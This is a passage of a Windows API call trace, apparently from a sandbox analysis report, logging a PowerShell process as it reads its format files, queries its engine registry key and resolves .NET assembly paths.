(hKey=0x308) returned 0x0 [0135.265] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0135.265] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0135.267] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x9ee64383, Data2=0xf7e, Data3=0x49dd, Data4=([0]=0x8b, [1]=0x3e, [2]=0xae, [3]=0x56, [4]=0x9a, [5]=0xda, [6]=0xc0, [7]=0x5c))) returned 0x0 [0135.272] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xfd3fbe41, Data2=0xa305, Data3=0x47ce, Data4=([0]=0x89, [1]=0x5f, [2]=0x36, [3]=0xfa, [4]=0xe2, [5]=0x76, [6]=0x8, [7]=0xb1))) returned 0x0 [0135.275] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x94fba808, Data2=0x65f9, Data3=0x4b18, Data4=([0]=0x82, [1]=0x3c, [2]=0x62, [3]=0xf9, [4]=0xdc, [5]=0x3f, [6]=0x26, [7]=0x81))) returned 0x0 [0135.276] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x6bc45aa0, Data2=0x8ad9, Data3=0x490d, Data4=([0]=0x9d, [1]=0xe7, [2]=0x4a, [3]=0x2a, [4]=0xf0, [5]=0xfd, [6]=0x51, [7]=0x3f))) returned 0x0 [0135.276] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x4cfe2878, Data2=0x479, Data3=0x41e0, Data4=([0]=0xb9, [1]=0xd4, [2]=0x87, [3]=0xba, [4]=0x6c, [5]=0xf2, [6]=0x9f, [7]=0x27))) returned 0x0 [0135.276] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x6892f476, Data2=0x3ba4, Data3=0x4d05, Data4=([0]=0xb9, [1]=0x13, [2]=0xad, [3]=0x19, [4]=0x6d, [5]=0x72, [6]=0x14, [7]=0x82))) returned 0x0 [0135.276] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0135.276] SetErrorMode (uMode=0x1) returned 0x1 [0135.277] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x308 [0135.277] GetFileType (hFile=0x308) returned 0x1 [0135.277] SetErrorMode (uMode=0x1) returned 0x1 [0135.277] GetFileType (hFile=0x308) returned 0x1 [0135.277] ReadFile (in: hFile=0x308, lpBuffer=0x3320100, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x3320100*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.281] ReadFile (in: hFile=0x308, lpBuffer=0x3320100, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x3320100*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.281] ReadFile (in: hFile=0x308, lpBuffer=0x3320100, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x3320100*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.282] ReadFile (in: hFile=0x308, lpBuffer=0x3320100, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x3320100*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.282] ReadFile (in: hFile=0x308, lpBuffer=0x3320100, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x3320100*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.283] ReadFile (in: hFile=0x308, lpBuffer=0x3320100, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x3320100*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.283] ReadFile (in: hFile=0x308, lpBuffer=0x3320100, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x3320100*, lpNumberOfBytesRead=0xcd038*=0xaca, lpOverlapped=0x0) returned 1 [0135.283] ReadFile (in: hFile=0x308, lpBuffer=0x331f732, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x331f732*, lpNumberOfBytesRead=0xcd038*=0x0, lpOverlapped=0x0) returned 1 [0135.283] ReadFile (in: hFile=0x308, lpBuffer=0x3320100, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x3320100*, lpNumberOfBytesRead=0xcd038*=0x0, lpOverlapped=0x0) returned 1 [0135.283] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0135.283] SetErrorMode (uMode=0x1) returned 0x1 [0135.284] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xccfe0 | out: lpFileInformation=0xccfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1 [0135.284] SetErrorMode (uMode=0x1) returned 0x1 [0135.284] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0135.284] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd0c8 | out: phkResult=0xcd0c8*=0x308) returned 0x0 [0135.284] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd04c, lpData=0x0, lpcbData=0xcd048*=0x0 | out: lpType=0xcd04c*=0x1, lpData=0x0, lpcbData=0xcd048*=0x56) returned 0x0 [0135.284] CoTaskMemAlloc (cb=0x5a) returned 0x1b80a900 [0135.284] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd01c, lpData=0x1b80a900, lpcbData=0xcd018*=0x56 | out: lpType=0xcd01c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd018*=0x56) returned 0x0 [0135.284] CoTaskMemFree (pv=0x1b80a900) [0135.284] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0135.285] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0135.297] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0xcc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c [0135.299] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0135.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0xcc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48 [0135.312] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.314] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xcc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0135.317] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0xcc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52 [0135.319] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0xcc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74 [0135.320] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xcc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0135.322] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0xcc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60 [0135.324] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xcc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0135.325] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xcc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0135.327] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xcc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0135.329] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0xcc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50 [0135.330] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0xcc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e [0135.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0xcc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c [0135.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0xcc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c [0135.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0135.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0xcc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48 [0135.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.397] VirtualQuery (in: lpAddress=0xcbb60, lpBuffer=0xcca20, dwLength=0x30 | out: lpBuffer=0xcca20*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.398] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xc4220ead, Data2=0x63f5, Data3=0x4186, Data4=([0]=0xb0, [1]=0x6e, [2]=0x80, [3]=0x31, [4]=0xd4, [5]=0xa3, [6]=0xf7, [7]=0x2d))) returned 0x0 [0135.399] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x87eeaec4, Data2=0xcc9c, Data3=0x49b6, Data4=([0]=0xa8, [1]=0x16, [2]=0x12, [3]=0xb3, [4]=0x6, [5]=0x89, [6]=0x43, [7]=0x18))) returned 0x0 [0135.400] VirtualQuery (in: lpAddress=0xcbd10, lpBuffer=0xccbd0, dwLength=0x30 | out: lpBuffer=0xccbd0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.401] VirtualQuery (in: lpAddress=0xcbd10, lpBuffer=0xccbd0, dwLength=0x30 | out: lpBuffer=0xccbd0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.402] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xff0bc38f, Data2=0x1905, Data3=0x4b3d, Data4=([0]=0x8d, [1]=0xb, [2]=0x9a, [3]=0x21, [4]=0x2f, [5]=0x3, [6]=0xb8, [7]=0x98))) returned 0x0 [0135.414] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xe02a6171, Data2=0xc492, Data3=0x4783, Data4=([0]=0x85, [1]=0x68, [2]=0x5a, [3]=0xc, [4]=0x84, [5]=0x43, [6]=0x1b, [7]=0x32))) returned 0x0 [0135.415] VirtualQuery (in: lpAddress=0xcbf60, lpBuffer=0xcce20, dwLength=0x30 | out: lpBuffer=0xcce20*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.416] VirtualQuery (in: lpAddress=0xcbca0, lpBuffer=0xccb60, dwLength=0x30 | out: lpBuffer=0xccb60*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.416] VirtualQuery (in: lpAddress=0xcbca0, lpBuffer=0xccb60, dwLength=0x30 | out: lpBuffer=0xccb60*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.416] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x7ffb0a72, Data2=0xca52, Data3=0x4600, Data4=([0]=0x82, [1]=0x6, [2]=0x9a, [3]=0x2a, [4]=0x4a, [5]=0xdb, [6]=0x3a, [7]=0xfc))) returned 0x0 [0135.417] VirtualQuery (in: lpAddress=0xcbf60, lpBuffer=0xcce20, dwLength=0x30 | out: lpBuffer=0xcce20*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.417] VirtualQuery (in: lpAddress=0xcbd80, lpBuffer=0xccc40, dwLength=0x30 | out: lpBuffer=0xccc40*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.417] VirtualQuery (in: lpAddress=0xcb5d0, lpBuffer=0xcc490, dwLength=0x30 | out: lpBuffer=0xcc490*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.418] VirtualQuery (in: lpAddress=0xcb5d0, lpBuffer=0xcc490, dwLength=0x30 | out: lpBuffer=0xcc490*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.418] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x60a2b333, Data2=0xc80f, Data3=0x4342, Data4=([0]=0x8e, [1]=0xa5, [2]=0x60, [3]=0xa0, [4]=0xc0, [5]=0x73, [6]=0xce, [7]=0xc5))) returned 0x0 [0135.419] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x42269648, Data2=0x7689, Data3=0x4485, Data4=([0]=0xa1, [1]=0xde, [2]=0x34, [3]=0xb5, [4]=0x68, [5]=0x29, [6]=0x2f, [7]=0x16))) returned 0x0 [0135.419] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0135.419] SetErrorMode (uMode=0x1) returned 0x1 [0135.419] SetErrorMode (uMode=0x1) returned 0x1 [0135.419] GetFileType (hFile=0x308) returned 0x1 [0135.420] ReadFile (in: hFile=0x308, lpBuffer=0x33d26f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x33d26f8*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.428] ReadFile (in: hFile=0x308, lpBuffer=0x33d26f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x33d26f8*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.431] ReadFile (in: hFile=0x308, lpBuffer=0x33d26f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x33d26f8*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.431] ReadFile (in: hFile=0x308, lpBuffer=0x33d26f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x33d26f8*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.432] ReadFile (in: hFile=0x308, lpBuffer=0x33d26f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x33d26f8*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.432] ReadFile (in: hFile=0x308, lpBuffer=0x33d26f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x33d26f8*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.432] ReadFile (in: hFile=0x308, lpBuffer=0x33d26f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x33d26f8*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.432] ReadFile (in: hFile=0x308, lpBuffer=0x33d26f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x33d26f8*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.433] ReadFile (in: hFile=0x308, lpBuffer=0x33d26f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x33d26f8*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.433] ReadFile (in: hFile=0x308, lpBuffer=0x33d26f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x33d26f8*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.433] ReadFile (in: hFile=0x308, lpBuffer=0x33d26f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x33d26f8*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.433] ReadFile (in: hFile=0x308, lpBuffer=0x33d26f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x33d26f8*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.433] ReadFile (in: hFile=0x308, lpBuffer=0x33d26f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x33d26f8*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.433] ReadFile (in: hFile=0x308, lpBuffer=0x33d26f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x33d26f8*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.434] ReadFile (in: hFile=0x308, lpBuffer=0x33d26f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, 